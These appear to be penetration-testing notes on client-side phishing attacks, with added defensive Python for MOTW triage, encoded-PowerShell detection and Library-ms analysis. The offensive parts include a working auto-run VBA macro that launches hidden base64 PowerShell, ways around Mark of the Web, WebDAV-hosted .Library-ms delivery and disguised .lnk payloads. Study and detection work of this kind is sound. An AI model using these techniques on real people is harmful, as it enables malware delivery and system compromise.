Client-Side

Information Gathering

site:example.com filetype:pdf

ffuf -ic -w <WORDLIST>:X -u <URL>/X -e .pdf

exiftool -a -u <FILE>

Token links: generate a link to be sent to the victim; once opened, it collects information about the visitor's system and sends it to a specified email address.

Microsoft Macro

Send files containing malicious macros. When a file comes from an external source (the internet, e.g. an email attachment or a direct download link), it carries the Mark of the Web (MOTW), so the victim must be persuaded to click Enable Editing / Enable Content, or to tick the Unblock checkbox in the file properties. Alternatively, find a way to prevent the MOTW from being applied.

MOTW bypass
  • If a file is saved directly to a FAT32/exFAT volume (e.g. a USB flash drive or SD card), Windows cannot add the MOTW, because the mark is stored in an NTFS alternate data stream (ADS).

  • Compress the content into a ZIP archive using non-Microsoft tools.

  • Extract ZIP archives with third-party apps such as 7-Zip/WinRAR, which do not carry the MOTW over to the extracted files.

  • Transfer files via cloud services (Google Drive, Dropbox, etc.): the file is recreated on the server, so the MOTW is lost.

  • Send or receive files via FTP/SFTP/SMB from non-Windows servers: these transfers do not preserve the ADS, so the MOTW is dropped.

  • Use container files such as ISO, VHD or IMG, which often do not propagate the MOTW to the files inside them.
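Every route in the list above ends the same way from a defender's point of view: the file arrives without a Zone.Identifier stream. The following Python is an added example (not from the original notes) showing what that stream contains, how to parse it, and how to read it on Windows/NTFS so that unmarked files from outside the organisation can be singled out during triage. The sample stream text, the host names and the function names are all constructed for the example.

```python
import configparser
import os
from typing import Optional

# Windows URL security zone IDs (URLZONE_*), as written into the Zone.Identifier stream.
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}

# Constructed sample of what a browser or mail client writes into <file>:Zone.Identifier.
SAMPLE_STREAM = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://mail.example.invalid/inbox\n"
    "HostUrl=https://files.example.invalid/report.docm\n"
)


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style body of a Zone.Identifier alternate data stream."""
    # only "=" separates keys from values; ":" must stay part of the URLs
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section: not a Zone.Identifier stream")
    sec = cp["ZoneTransfer"]
    zone_id = int(sec.get("ZoneId", "-1"))
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer": sec.get("ReferrerUrl"),
        "host": sec.get("HostUrl"),
    }


def read_motw(path: str) -> Optional[dict]:
    """Read a file's Zone.Identifier stream on Windows/NTFS.

    Returns None when the stream is absent, i.e. the file carries no mark
    (never marked, or the mark was dropped in transit by one of the routes listed above).
    """
    if os.name != "nt":
        raise OSError("alternate data streams are only readable on Windows/NTFS")
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except FileNotFoundError:
        return None


def classify(mark: Optional[dict]) -> str:
    """Triage verdict for a file that is known to have come from outside."""
    if mark is None:
        return "unmarked"          # no Protected View / macro block will apply: highest risk
    if mark["zone_id"] >= 3:
        return "marked-internet"   # Office applies Protected View and blocks macros
    return "marked-local"


if __name__ == "__main__":
    mark = parse_zone_identifier(SAMPLE_STREAM)
    print(mark, classify(mark), classify(None))
```

The useful output of a sweep over a download or attachment directory is the set of files that return "unmarked": those are exactly the ones for which the Office protections the page describes never engage.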

  1. Create a Word file with the extension .doc or .docm (not .docx, which cannot store macros in the document, so the macro would not persist).

  2. View -> Macros -> enter a <NAME>, store it in the document -> Create, then write the code in the Visual Basic for Applications editor.

  3. Write the macro so that it reaches the underlying operating system commands through the Windows Script Host Shell object (WScript.Shell).

Macros

Because VBA limits a string literal to 255 characters, base64-encode the PowerShell command on Windows and split it into chunks that are concatenated at run time.

# Python helper: prints one VBA concatenation line per chunk of the encoded command
cmd = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50  # chunk size, safely below VBA's 255-character literal limit
for i in range(0, len(cmd), n):
    print('Str = Str + "' + cmd[i:i + n] + '"')

' VBA: both auto-run entry points call the same macro
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    ' ...
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
    ' run the assembled command through the Windows Script Host shell
    CreateObject("Wscript.Shell").Run Str
End Sub
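What the macro above launches shows up in process-creation telemetry (Sysmon event 1, Windows event 4688) as a powershell.exe command line with -nop, -w hidden and a base64 blob after -enc. The Python below is an added example for the detection side, not code from the original notes: it recovers the script from any accepted spelling of -EncodedCommand (PowerShell takes any unambiguous prefix, so -e, -ec and -enc all work) and tags the accompanying switches. The sample command line is constructed in the block from a harmless script; the indicator names and function names are the example's own.

```python
import base64
import re

# "-e", "-ec", "-enc", ...: PowerShell accepts any unambiguous prefix of -EncodedCommand.
_ENC_FLAG = re.compile(r"(?i)(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Switches that commonly accompany an encoded command in loader one-liners.
_INDICATORS = {
    "hidden window": re.compile(r"(?i)(?<!\S)-w[a-z]*\s+hidden\b"),
    "no profile": re.compile(r"(?i)(?<!\S)-nop[a-z]*\b"),
    "non-interactive": re.compile(r"(?i)(?<!\S)-noni[a-z]*\b"),
}

# Constructed sample: a benign script wrapped the way the macro above wraps its payload.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
SAMPLE_CMDLINE = (
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)


def decode_encoded_command(cmdline: str):
    """Return the script carried by -EncodedCommand, or None if there is none."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy also starts with "-e"
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid blob; keep scanning
    return None


def triage(cmdline: str):
    """Return (indicator names, decoded script or None) for one process command line."""
    findings = [name for name, rx in _INDICATORS.items() if rx.search(cmdline)]
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append("encoded command")
    return findings, script


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Decoding is cheap enough to run on every powershell.exe creation event; the combination of "hidden window", "no profile" and "encoded command" on a process whose parent is WINWORD.EXE is the pattern this macro technique produces.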

Windows Library Files

Windows library files are virtual containers for user content. They connect users with data stored in remote locations like web services or shares. These files have a .Library-ms file extension and can be executed by double-clicking them in Windows Explorer.

  1. Create a Windows Library file (.Library-ms) to be sent to the victim. When they double-click it, it appears as a normal directory in Windows Explorer.

  2. Set up a WebDAV server:
     pipx install wsgidav
     mkdir webdav; wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ./webdav

  3. Create the malicious files to be placed on the WebDAV server (e.g. a .lnk file).

  4. Send the .Library-ms file to the victim and convince them to double-click the .lnk payload file to execute it.

Windows Library Files

Library files are written in XML and consist of three main parts: General Library Information, Library Properties, Library Locations.

After the library has been used, Windows rewrites the file to optimise it. To make sure it still works (especially on other machines), delete the added serialized tag and re-enter the URL.
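Because a .Library-ms file is plain XML, the same three parts the text names can be checked automatically when one arrives as an attachment. The Python below is an added example, not code from the original notes: it reads the Library Locations part, reports every location, marks the ones that resolve off the local machine (URLs or UNC paths) and notes whether the serialized element mentioned above is present. The sample library is constructed for the example with a placeholder host name; the function names are the example's own.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample: a library whose only location is a remote (placeholder) host,
# which is the case worth flagging when triaging attachments.
SAMPLE_LIBRARY = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>http://webdav.example.invalid</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def is_remote(location: str) -> bool:
    """True for locations that resolve off the local machine (UNC path or network URL)."""
    if location.startswith("\\\\"):
        return True
    return urlparse(location).scheme.lower() in {"http", "https", "ftp", "webdav"}


def analyze_library(xml_data) -> dict:
    """Summarise a .Library-ms file: its name, every location and whether any is remote."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    name_el = root.find("lib:name", NS)
    locations = []
    for loc in root.iterfind(".//lib:simpleLocation", NS):
        url_el = loc.find("lib:url", NS)
        url = (url_el.text or "").strip() if url_el is not None else ""
        locations.append({
            "url": url,
            "remote": is_remote(url),
            # <serialized> is the element Windows adds to the location after first use
            "serialized": loc.find("lib:serialized", NS) is not None,
        })
    return {
        "name": (name_el.text or "").strip() if name_el is not None else "",
        "locations": locations,
        "remote": any(entry["remote"] for entry in locations),
    }


if __name__ == "__main__":
    print(analyze_library(SAMPLE_LIBRARY))
```

A library received from outside that reports remote as True deserves the same handling as an executable attachment: the "folder" the user sees is served by the host in the url element, and everything in it, .lnk files included, comes from there.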

Malicious .lnk File

New -> Shortcut -> enter the payload in the location field -> give the shortcut a name

The malicious command can be hidden by inserting a delimiter followed by a harmless command, so that the malicious part is pushed out of the visible area of the Target field in the file properties dialog.
